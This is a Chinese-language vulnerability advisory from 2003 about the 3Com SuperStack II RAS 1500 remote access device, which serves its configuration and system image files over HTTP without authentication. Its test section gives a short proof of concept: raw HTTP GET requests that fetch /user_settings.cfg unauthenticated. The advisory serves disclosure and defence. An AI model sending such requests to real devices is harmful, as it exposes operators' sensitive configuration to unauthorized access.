发布日期：2003-03-24
更新日期：2003-03-31

受影响系统：

3Com SuperStack II RAS 1500

描述：

---

BUGTRAQ  ID: 7176

3com SuperStack II远程访问系统1500是通过BRI-ISDN/模拟线路来访问电信设备的设备。

3com SuperStack II远程访问系统部分文件可以未授权访问，远程攻击者可以利用这个漏洞获得系统设备敏感信息。

RAS 1500只对download.htm文件（用于配置文件和系统软件的下载管理程序）进行了保护，需要HTTP BASIC方式的验证，而对系统映象文件，配置文件没有任何保护，攻击者可以未授权访问这些文件，获得敏感信息。

<*来源：Piotr Chytla （pch@isec.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104852250406896&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Piotr Chytla （pch@isec.pl）提供了如下测试方法：

GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Content-Type: text/html
Server: Allegro-Software-RomPager/2.10

GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Date: Mon, 25 May 1998 00:26:38 GMT
Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
[..]

建议：

---

厂商补丁：

3Com
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.3com.com

浏览次数：2877
严重程度：0（网友投票）